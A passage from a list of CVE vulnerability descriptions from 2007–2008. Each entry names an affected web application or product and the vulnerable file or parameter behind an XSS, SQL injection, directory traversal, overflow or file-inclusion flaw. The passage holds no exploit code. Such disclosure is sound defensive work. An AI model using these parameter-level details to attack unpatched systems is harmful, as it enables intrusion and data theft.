SQL commands via the user_name parameter to actions.php, and unspecified other vectors. [CVE-2008-0141] actions.php in WebPortal CMS 0.6-beta generates predictable passwords containing only the time of day, which makes it easier for remote attackers to obtain access to any account via a lostpass action. [CVE-2008-0140] Directory traversal vulnerability in error.php in Uebimiau Webmail 2.7.10 and 2.7.2 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the selected_theme parameter, a different vector than CVE-2007-3172. [CVE-2008-0135] Snitz Forums 2000 3.4.06 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for forum/snitz_forums_2000.mdb. [CVE-2008-0134] Cross-site scripting (XSS) vulnerability in Forums/setup.asp in Snitz Forums 2000 3.4.06 and earlier allows remote attackers to inject arbitrary web script or HTML via the MAIL parameter. [CVE-2008-0131] Cross-site scripting (XSS) vulnerability in login_form.asp in Instant Softwares Dating Site allows remote attackers to inject arbitrary web script or HTML via the msg parameter, a different product than CVE-2006-6022. NOTE: the provenance of this information is unknown [CVE-2008-0127] The administration interface in McAfee E-Business Server 8.5.2 and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long initial authentication packet. [CVE-2008-0125] Cross-site scripting (XSS) vulnerability in phpstats.php in Michael Wagner phpstats 0.1 alpha allows remote attackers to inject arbitrary web script or HTML via the baseDir parameter. [CVE-2008-0124] Cross-site scripting (XSS) vulnerability in Serendipity (S9Y) before 1.3-beta1 allows remote authenticated users to inject arbitrary web script or HTML via (1) the "Real name" field in Personal Settings, which is presented to readers of articles [CVE-2008-0123] Cross-site scripting (XSS) vulnerability in install.php for Moodle 1.8.3, and possibly other versions before 1.8.4, allows remote attackers to inject arbitrary web script or HTML via the dbname parameter. NOTE: this issue only exists until the installation is complete. [CVE-2008-0093] Multiple cross-site scripting (XSS) vulnerabilities in newticket.php in eTicket 1.5.5.2, and 1.5.6 RC2 and RC3, allow remote attackers to inject arbitrary web script or HTML via the (1) Name and (2) Subject parameters. [CVE-2008-0092] Cross-site scripting (XSS) vulnerability in index.php in the search module in Appalachian State University phpWebSite 1.4.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2008-0091] Directory traversal vulnerability in download2.php in AGENCY4NET WEBFTP 1 allows remote attackers to read and delete arbitrary files via a .. (dot dot) in the file parameter. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0050] CFNetwork in Apple Mac OS X 10.4.11 allows remote HTTPS proxy servers to spoof secure websites via data in a 502 Bad Gateway error. [CVE-2008-0041] Parental Controls in Apple Mac OS X 10.5 through 10.5.1 contacts www.apple.com "when a website is unblocked," which allows remote attackers to determine when a system is running Parental Controls. [CVE-2008-0026] SQL injection vulnerability in Cisco Unified CallManager/Communications Manager (CUCM) 5.0/5.1 before 5.1(3a) and 6.0/6.1 before 6.1(1a) allows remote authenticated users to execute arbitrary SQL commands via the key parameter to the (1) admin and (2) user interface pages. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6751] Cross-site scripting (XSS) vulnerability in the MailForm plugin before 1.20 for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6728] Cross-site scripting (XSS) vulnerability in XMB 1.5 allows remote attackers to inject arbitrary web script or HTML via the MSN field during user registration. [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/. [CVE-2007-6711] Unspecified vulnerability in customer.php in FreeWebshop.org 2.2.5, 2.2.6 and 2.2.7WIP1/2 allows remote attackers to gain administrator privileges via unknown vectors. [CVE-2007-6707] Multiple cross-site scripting (XSS) vulnerabilities on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2007-3574. [CVE-2007-6705] The WebSphere MQ XA 5.3 before FP13 and 6.0.x before 6.0.2.1 client for Windows, when running in an MTS or a COM+ environment, grants the PROCESS_DUP_HANDLE privilege to the Everyone group upon connection to a queue manager, which allows local users to duplicate an arbitrary handle and possibly hijack an arbitrary process. [CVE-2007-6704] Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass 4100 SSL VPN 5.4.1 through 5.5.2 and 6.0 through 6.0.1, when pre-logon sequences are enabled, allow remote attackers to inject arbitrary web script or HTML via the query string to (1) my.activation.php3 and (2) my.logon.php3. [CVE-2007-6702] goform/QuickStart_c0 on the GoAhead Web Server on the FS4104-AW (aka rooter) VDSL device contains a password in the typepassword field, which allows remote attackers to obtain this password by reading the HTML source, a different vulnerability than CVE-2002-1603. [CVE-2007-6696] Multiple cross-site scripting (XSS) vulnerabilities in WebCalendar 1.1.6 allow remote attackers to inject arbitrary web script or HTML via (1) an event description, (2) the query string to pref.php, and (3) the adv parameter to search.php. NOTE: vector 1 requires user authentication. [CVE-2007-6695] Cross-site scripting (XSS) vulnerability in index.php in Drake CMS 0.4.9 allows remote attackers to inject arbitrary web script or HTML via the option parameter. [CVE-2007-6693] Unspecified vulnerability in the WebCam module in Menalto Gallery before 2.2.4 has unknown impact and attack vectors related to a "proxied request." [CVE-2007-6692] Open redirect vulnerability in Menalto Gallery before 2.2.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the (1) Core and (2) print modules. [CVE-2007-6691] Multiple unspecified vulnerabilities in Menalto Gallery before 2.2.4 have unknown impact, related to (1) "hotlink protection" in the URL rewrite module, (2) a WebDAV view in the WebDAV module, (3) a comment view in the Comment module, (4) unspecified "item information disclosure attacks" in the Core module Gallery application, (5) the slideshow in the Slideshow module, and (6) multiple Print modules. [CVE-2007-6688] Unspecified vulnerability in the Installation application in Menalto Gallery before 2.2.4 has unknown impact and attack vectors related to "web-accessibility protection of the storage folder." [CVE-2007-6687] Multiple cross-site scripting (XSS) vulnerabilities in Menalto Gallery before 2.2.4 allow remote attackers to inject arbitrary web script or HTML via crafted filenames to the (1) Core or (2) add-item modules [CVE-2007-6679] Unspecified vulnerability in the Administrative Console in IBM WebSphere Application Server 6.1 before Fix Pack 13 has unknown impact and attack vectors, related to "security concerns with monitor role users." NOTE: it was later reported that 6.0.2 before Fix Pack 25 is also affected. [CVE-2007-6677] Cross-site scripting (XSS) vulnerability in Peter's Random Anti-Spam Image 0.2.4 and earlier plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the comment field in the comment form. [CVE-2007-6674] Cross-site scripting (XSS) vulnerability in Default.asp in RapidShare Database allows remote attackers to inject arbitrary web script or HTML via the Arayalim parameter. [CVE-2007-6673] Cross-site scripting (XSS) vulnerability in Makale Scripti allows remote attackers to inject arbitrary web script or HTML via the ara parameter to the default URI under Ara/ in a search action. [CVE-2007-6669] Cross-site scripting (XSS) vulnerability in search.php in PHCDownload 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the string parameter. [CVE-2007-6664] SQL injection vulnerability in index.php in WebPortal CMS 0.6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the m parameter. [CVE-2007-6659] Multiple cross-site scripting (XSS) vulnerabilities in 2z project 0.9.6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) contentshort or (2) contentfull parameter in an addnews action to the default URI [CVE-2007-6654] Buffer overflow in a certain ActiveX control in Macrovision InstallShield Update Service Web Agent 5.1.100.47363 allows remote attackers to execute arbitrary code via a long string in the ProductCode argument (second argument) to the DownloadAndExecute method, a different vulnerability than CVE-2007-0321, CVE-2007-2419, and CVE-2007-5660. [CVE-2007-6652] cpie.php in XCMS 1.83 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to conduct direct static code injection attacks and execute arbitrary code via the testo_0 parameter in a cpie admin action to index.php, which writes to dati/generali/footer.dtb (aka the XCMS footer). [CVE-2007-6646] Multiple cross-site scripting (XSS) vulnerabilities in LiveCart 1.0.1, and possibly other versions before 1.1.0, allow remote attackers to inject arbitrary web script or HTML via (1) the return parameter to user/remindPassword, (2) the q parameter to the category script, (3) the return parameter to the order script, or (4) the email parameter to user/remindComplete. [CVE-2007-6643] Cross-site scripting (XSS) vulnerability in the com_poll component in Joomla! before 1.5 RC4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6641] Cross-site scripting (XSS) vulnerability in dir.php in milliscripts Redirection allows remote attackers to inject arbitrary web script or HTML via the cat parameter in a browse action. [CVE-2007-6640] Creammonkey 0.9 through 1.1 and GreaseKit 1.2 through 1.3 does not properly prevent access to dangerous functions, which allows remote attackers to read the configuration, modify the configuration, or send an HTTP request via the (1) GM_addStyle, (2) GM_log, (3) GM_openInTab, (4) GM_setValue, (5) GM_getValue, or (6) GM_xmlhttpRequest function within a web page on which a userscript is configured. [CVE-2007-6638] March Networks DVR 3204 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames, passwords, device names, and IP addresses via a direct request for scripts/logfiles.tar.gz. [CVE-2007-6637] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash Player allow remote attackers to inject arbitrary web script or HTML via a crafted SWF file, related to "pre-generated SWF files" and Adobe Dreamweaver CS3 or Adobe Acrobat Connect. NOTE: the asfunction: vector is already covered by CVE-2007-6244.1. [CVE-2007-6633] Multiple cross-site scripting (XSS) vulnerabilities in FAQMasterFlexPlus, possibly 1.5 or 1.52, allow remote attackers to inject arbitrary web script or HTML via (1) the cat_name parameter to faq.php [CVE-2007-6617] Cross-site scripting (XSS) vulnerability in 500page.jsp in JIRA Enterprise Edition before 3.12.1 allows remote attackers to inject arbitrary web script or HTML, which is not properly handled when generating error messages, as demonstrated by input originally sent in the URI to secure/CreateIssue. NOTE: some of these details are obtained from third party information. [CVE-2007-6616] Cross-site scripting (XSS) vulnerability in simpleforum.cgi in SimpleForum 4.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchkey parameter in a search action. NOTE: some of these details are obtained from third party information. [CVE-2007-6611] Cross-site scripting (XSS) vulnerability in view.php in Mantis before 1.1.0 allows remote attackers to inject arbitrary web script or HTML via a filename, related to bug_report.php. [CVE-2007-6608] Multiple cross-site scripting (XSS) vulnerabilities in OpenBiblio 0.5.2-pre4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) LAST and (2) FIRST parameters to admin/staff_del_confirm.php, (3) the name parameter to admin/theme_del_confirm.php, or (4) the themeName parameter to admin/theme_preview.php. [CVE-2007-6597] Multiple cross-site scripting (XSS) vulnerabilities in IPortalX before Build 033 allow remote attackers to inject arbitrary web script or HTML via the (1) KW and (2) SF parameters to forum/login_user.asp, and (3) the Date parameter to blogs.asp. [CVE-2007-6592] Apple Safari 2, when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, regards the certificate as also accepted for all domain names in subjectAltName:dNSName fields, which makes it easier for remote attackers to trick a user into accepting an invalid certificate for a spoofed web site. [CVE-2007-6591] KDE Konqueror 3.5.5 and 3.95.00, when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, regards the certificate as also accepted for all domain names in subjectAltName:dNSName fields, even though these fields cannot be examined in the product, which makes it easier for remote attackers to trick a user into accepting an invalid certificate for a spoofed web site. [CVE-2007-6588] Cross-site scripting (XSS) vulnerability in PHCDownload 1.10 allows remote attackers to inject arbitrary web script or HTML via the username field in an unspecified component. NOTE: the provenance of this information is unknown [CVE-2007-6574] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.4 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the origin parameter to work/work.php in a display_upload_form action, or the forum parameter to (2) forum/viewforum.php or (3) forum/viewthread.php. [CVE-2007-6572] Cross-site scripting (XSS) vulnerability in Sun Java System Web Server 6.1 before SP8 and 7.0 before Update 1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6566204. [CVE-2007-6571] Cross-site scripting (XSS) vulnerability in Sun Java System Web Proxy Server 3.6 before SP11 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6611356. [CVE-2007-6570] Cross-site scripting (XSS) vulnerability in the View URL Database functionality in Sun Java System Web Proxy Server 4.x before 4.0.6 and 3.x before 3.6 SP11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6566309. [CVE-2007-6569] Cross-site scripting (XSS) vulnerability in the View Error Log functionality in Sun Java System Web Proxy Server 4.x before 4.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6566246. [CVE-2007-6564] Cross-site scripting (XSS) vulnerability in admin.php in Limbo CMS 1.0.4.2 allows remote attackers to inject arbitrary web script or HTML via the com_option parameter. [CVE-2007-6560] Multiple cross-site scripting (XSS) vulnerabilities in Logaholic before 2.0 RC8 allow remote attackers to inject arbitrary web script or HTML via (1) the newconfname parameter to profiles.php or (2) the conf parameter to index.php. [CVE-2007-6556] Multiple SQL injection vulnerabilities in websihirbazi 5.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to default.asp in a news page action or (2) the pageid parameter to default.asp. [CVE-2007-6550] form.php in PMOS Help Desk 2.4 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to conduct eval injection attacks and execute arbitrary PHP code via the options array parameter. [CVE-2007-6545] Multiple cross-site scripting (XSS) vulnerabilities in RunCMS before 1.6.1 allow remote attackers to inject arbitrary web script or HTML via (1) the subject parameter to modules/news/submit.php [CVE-2007-6541] Multiple cross-site scripting (XSS) vulnerabilities in neuron news 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the topic parameter in a viewtopic action, or the (2) newsyear or (3) newsmonth parameter in a newsarchive action to the default URI in patch/. [CVE-2007-6538] SQL injection vulnerability in ing/blocks/mrbs/code/web/view_entry.php in the MRBS plugin for Moodle allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2007-6526] Cross-site scripting (XSS) vulnerability in tiki-special_chars.php in TikiWiki before 1.9.9 allows remote attackers to inject arbitrary web script or HTML via the area_name parameter. [CVE-2007-6517] SQL injection vulnerability in the forget password section (LostPwd.asp) in Eagle Software Aeries Browser Interface (ABI) 3.7.9.17 allows remote attackers to execute arbitrary SQL commands via the EmailAddress parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-6512] PHP MySQL Banner Exchange 2.2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database information via a direct request to inc/lib.inc. [CVE-2007-6511] Websense Enterprise 6.3.1 allows remote attackers to bypass content filtering by visiting http URLs with a (1) RealPlayer G2, (2) MSMSGS, or (3) StoneHttpAgent User-Agent header, which results in a Non-HTTP categorization. [CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code. [CVE-2007-6495] inc_newuser.asp in Hosting Controller 6.1 Hot fix 3.3 and earlier allows remote authenticated users to change the permissions of directories named (1) db, (2) www, (3) Special, and (4) log at arbitrary locations under the web root via a modified Dirroot parameter in an AddUser action to accounts/AccountActions.asp. NOTE: this can be leveraged for remote code execution by changing the permissions of \Forum\db, which is configured for execution of ASP scripts with administrative privileges, and then uploading a script to \Forum\db. [CVE-2007-6493] The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to execute arbitrary code via a certain argument to the SetHandler method. [CVE-2007-6492] The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via an empty string in the argument to the ProcessRequestEx method. [CVE-2007-6491] Multiple SQL injection vulnerabilities in Kvaliitti WebDoc 3.0 CMS allow remote attackers to execute arbitrary SQL commands via (1) the cat_id parameter to categories.asp [CVE-2007-6489] Multiple cross-site scripting (XSS) vulnerabilities in Falcon Series One CMS 1.4.3 allow remote attackers to inject arbitrary web script or HTML via the (1) gb_mail, (2) gb_name, and (3) gb_text parameters in a guestbook action to index.php, and unspecified other vectors. [CVE-2007-6487] Unspecified vulnerability in Plain Black WebGUI 7.4.0 through 7.4.17 allows remote authenticated users with Secondary Admin privileges to create Admin accounts, a different vulnerability than CVE-2006-0680. [CVE-2007-6486] Multiple cross-site scripting (XSS) vulnerabilities in shout.php (aka the shoutbox) in LineShout 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) username (nickname) or (2) message parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-6474] Multiple cross-site scripting (XSS) vulnerabilities in GF-3XPLORER 2.4 allow remote attackers to inject arbitrary web script or HTML via the newdir parameter to index_3x.php, and unspecified other vectors. [CVE-2007-6470] phpRPG 0.8 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read session ID values in files under tmp/, and then hijack sessions via PHPSESSID cookies. [CVE-2007-6466] Multiple SQL injection vulnerabilities in index.php in FreeWebshop 2.2.1 allow remote attackers to execute arbitrary SQL commands via (1) the prod parameter in a details action, (2) the cat parameter in a browse list action, or (3) the group parameter in a categories action. NOTE: it was later reported that MOG - Web Shop (MOG-WebShop), a product based on the same code, is also affected. [CVE-2007-6465] Multiple cross-site scripting (XSS) vulnerabilities in ganglia-web in Ganglia before 3.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) c and (2) h parameters to (a) web/host_gmetrics.php [CVE-2007-6463] Multiple cross-site scripting (XSS) vulnerabilities in the admin panel in PHP Real Estate Classifieds allow remote attackers to inject arbitrary web script or HTML via unspecified "text areas/boxes." [CVE-2007-6461] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Flyspray 0.9.9 through 0.9.9.3 allow remote attackers to inject arbitrary web script or HTML via (1) the query string in an index action, related to the savesearch JavaScript function [CVE-2007-6460] Multiple cross-site scripting (XSS) vulnerabilities in Anon Proxy Server before 0.101 allow remote attackers to inject arbitrary web script or HTML via the URI, which is later displayed by (1) log.php or (2) logerror.php, a different vulnerability than CVE-2007-6459. [CVE-2007-6457] Stack-based buffer overflow in the webmail feature in SurgeMail 38k4 allows remote attackers to cause a denial of service (crash) via a long Host header. [CVE-2007-6455] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Mambo 4.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Itemid parameter in a com_frontpage option and the (2) option parameter. [CVE-2007-6453] Directory traversal vulnerability in raidenhttpd-admin/workspace.php in RaidenHTTPD 2.0.19, when the WebAdmin function is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ulang parameter. [CVE-2007-6452] Unspecified vulnerability in the benchmark reporting system in Google Web Toolkit (GWT) before 1.4.61 has unknown impact and attack vectors, possibly related to cross-site scripting (XSS). [CVE-2007-6424] registry.pl in Fonality Trixbox 2.0 PBX products, when running in certain environments, reads and executes a set of commands from a remote web site without sufficiently validating the origin of the commands, which allows remote attackers to disable trixbox and execute arbitrary commands via a DNS spoofing attack. [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL. [CVE-2007-6414] admin/administrator.php in Adult Script 1.6 and earlier sends a redirect to the web browser but does not exit, which allows remote attackers to bypass authentication and obtain administrative credentials via a direct request. NOTE: this can be leveraged for arbitrary code execution through a request to admin/videolinks_view.php. [CVE-2007-6407] Multiple cross-site scripting (XSS) vulnerabilities in IBM Tivoli Provisioning Manager Express allow remote attackers to inject arbitrary web script or HTML via the (1) "assess modification," (2) user-id, and other unspecified fields to the /tpmx URI [CVE-2007-6406] Multiple cross-site scripting (XSS) vulnerabilities in CA (formerly Computer Associates) eTrust Threat Management Console allow remote attackers to inject arbitrary web script or HTML via the IP Address field and other unspecified fields. [CVE-2007-6395] Flat PHP Board 1.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain credentials via a direct request for the username php file for any user account in users/. [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6384] Unspecified vulnerability in the Image Converter functionality in BEA WebLogic Mobility Server 3.3, 3.5, and 3.6 through 3.6 SP1 allows remote attackers to obtain application file and resource access via unspecified vectors. [CVE-2007-6374] Multiple cross-site scripting (XSS) vulnerabilities in Bitweaver 2.0.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) users/register.php or (2) search/index.php, or an editcomments action in (3) wiki/index.php or (4) forums/index.php. NOTE: the error parameter to users/login.php is covered by CVE-2006-3103. [CVE-2007-6367] Multiple cross-site scripting (XSS) vulnerabilities in the guestbook in SineCMS 2.3.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username (user) or (2) comment (commento) field, different vectors than CVE-2007-2357. [CVE-2007-6365] Cross-site scripting (XSS) vulnerability in modules/ecal/display.php in the Event Calendar in bcoos 1.0.10 allows remote attackers to inject arbitrary web script or HTML via the month parameter. NOTE: the provenance of this information is unknown [CVE-2007-6364] Cross-site scripting (XSS) vulnerability in modificarPerfil.php in JLMForo System allows remote authenticated users to inject arbitrary web script or HTML via a signature. [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server. [CVE-2007-6349] P4Webs.exe in Perforce P4Web 2006.2 and earlier, when running on Windows, allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with an empty body and a Content-Length greater than 0. [CVE-2007-6346] Cross-site scripting (XSS) vulnerability in Rainboard before 2.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6344] Directory traversal vulnerability in modules/cms/index.php in Mcms Easy Web Make 1.3, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the template parameter. [CVE-2007-6343] Cross-site scripting (XSS) vulnerability in HP OpenView Network Node Manager (OV NNM) 6.41, 7.01, and 7.51 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6321] Cross-site scripting (XSS) vulnerability in RoundCube webmail 0.1rc2, 2007-12-09, and earlier versions, when using Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via style sheets containing expression commands. [CVE-2007-6317] Multiple directory traversal vulnerabilities in BarracudaDrive Web Server before 3.8 allow (1) remote attackers to read arbitrary files via certain ..\ (dot dot backslash) sequences in the URL path, or (2) remote authenticated users to delete arbitrary files or create arbitrary directories via a ..\ (dot dot backslash) sequence in the dir parameter to /drive/c/bdusers/USER/. [CVE-2007-6316] Cross-site scripting (XSS) vulnerability in BarracudaDrive Web Server before 3.8 allows remote attackers to inject arbitrary web script or HTML via the URI path in an HTTP GET request, which is activated by administrators viewing log files via the Trace page. [CVE-2007-6315] Group Chat in BarracudaDrive Web Server before 3.8 allows remote authenticated users to cause a denial of service (crash) via a HTTP request to /eh/chat.ehintf/C. that does not contain a Connection ID, which results in a NULL pointer dereference. [CVE-2007-6314] BarracudaDrive Web Server before 3.8 allows remote attackers to read the source code for web scripts by appending a (1) + (plus), (2) . (dot), or (3) %80 and similar characters to the file name in the URL. [CVE-2007-6312] Cross-site scripting (XSS) vulnerability in the logon page in Web Reporting Tools portal in Websense Enterprise and Web Security Suite 6.3 allows remote attackers to inject arbitrary web script or HTML via the username field. [CVE-2007-6310] Multiple cross-site scripting (XSS) vulnerabilities in Falt4Extreme RC4 10.9.2007 allow remote attackers to inject arbitrary web script or HTML via the handler parameter to (1) index.php and possibly (2) admin/index.php, and (3) the topic parameter to modules/feed/feed.php (aka modules/feed.php). [CVE-2007-6309] Multiple cross-site scripting (XSS) vulnerabilities in index.php in webSPELL 4.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the galleryID parameter in a usergallery upload action [CVE-2007-6308] Cross-site scripting (XSS) vulnerability in HttpLogger 0.8.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6307] Multiple cross-site scripting (XSS) vulnerabilities in clickstats.php in wwwstats 3.21 allow remote attackers to inject arbitrary web script or HTML via (1) the link parameter or (2) the User-Agent HTTP header. [CVE-2007-6306] Multiple cross-site scripting (XSS) vulnerabilities in the image map feature in JFreeChart 1.0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) chart name or (2) chart tool tip text [CVE-2007-6301] Cross-site scripting (XSS) vulnerability in compose.php in OpenNewsletter 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the type parameter. [CVE-2007-6298] Cross-site scripting (XSS) vulnerability in the Shoutbox module for Drupal 5.x before Shoutbox 5.x-1.1 allows remote authenticated users to inject arbitrary web script or HTML via Shoutbox block messages. [CVE-2007-6297] Multiple cross-site scripting (XSS) vulnerabilities in PHPMyChat 0.14.5 allow remote attackers to inject arbitrary web script or HTML via the (1) LIMIT parameter to chat/deluser.php3, the (2) Link parameter to chat/edituser.php3, or the (3) LastCheck or (4) B parameter to chat/users_popupL.php3. NOTE: the FontName vectors for start_page.css.php3 and style.css.php3 are already covered by CVE-2005-1619. The medium vectors for start_page.css.php3 (start_page.css.php) and style.css.php3 (style.css.php), and the From vector for users_popupL.php3 (users_popupL.php), are already covered by CVE-2005-3991. [CVE-2007-6295] Cross-site scripting (XSS) vulnerability in the WebRunMenuFrame page in the online meeting center template in IBM Lotus Sametime before 8.0 allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2007-6290] Multiple directory traversal vulnerabilities in js/get_js.php in SERWeb 2.0.0 dev1 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) mod and (2) js parameters. [CVE-2007-6289] Multiple PHP remote file inclusion vulnerabilities in SerWeb 2.0.0 dev1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) _SERWEB[configdir] parameter to load_lang.php, (2) _SERWEB[functionsdir] parameter to main_prepend.php, and the (3) _PHPLIB[libdir] parameter to load_phplib.php, different vectors than CVE-2007-3359 and CVE-2007-3358. [CVE-2007-6287] Cross-site scripting (XSS) vulnerability in the login page in Lxlabs HyperVM 2.0 allows remote attackers to inject arbitrary web script or HTML via the frm_emessage parameter, a different vector than CVE-2006-6649. NOTE: the provenance of this information is unknown [CVE-2007-6274] Multiple cross-site scripting (XSS) vulnerabilities in modules/ecal/display.php in the Event Calendar in bcoos 1.0.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) day or (2) year parameter. [CVE-2007-6270] Multiple cross-site scripting (XSS) vulnerabilities in Absolute News Manager.NET 5.1 allow remote attackers to inject arbitrary web script or HTML via the (1) rmore parameter to xlaabsolutenm.aspx and the (2) template parameter to pages/default.aspx. [CVE-2007-6244] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash Player 9.x up to 9.0.48.0 and 8.x up to 8.0.35.0 allow remote attackers to inject arbitrary web script or HTML via (1) a SWF file that uses the asfunction: protocol or (2) the navigateToURL function when used with the Flash Player ActiveX Control in Internet Explorer. [CVE-2007-6232] Cross-site scripting (XSS) vulnerability in index.php in FTP Admin 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter in an error page action. [CVE-2007-6219] Cross-site scripting (XSS) vulnerability in IBM Tivoli Netcool Security Manager 1.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6215] Multiple directory traversal vulnerabilities in play.php in Web-MeetMe 3.0.3 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) roomNo and possibly the (2) bookid parameter. [CVE-2007-6213] Multiple directory traversal vulnerabilities in mod/chat/index.php in WebED 0.0.9 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) Root and (2) Path parameters. [CVE-2007-6205] Cross-site scripting (XSS) vulnerability in the remote RSS sidebar plugin (serendipity_plugin_remoterss) in S9Y Serendipity before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via a link in an RSS feed. [CVE-2007-6204] Multiple stack-based buffer overflows in HP OpenView Network Node Manager (OV NNM) 6.41, 7.01, and 7.51 allow remote attackers to execute arbitrary code via unspecified long arguments to (1) ovlogin.exe, (2) OpenView5.exe, (3) snmpviewer.exe, and (4) webappmon.exe, as demonstrated via a long Action parameter to OpenView5.exe. [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918. [CVE-2007-6196] Cross-site scripting (XSS) vulnerability in util.php in Calacode @Mail before 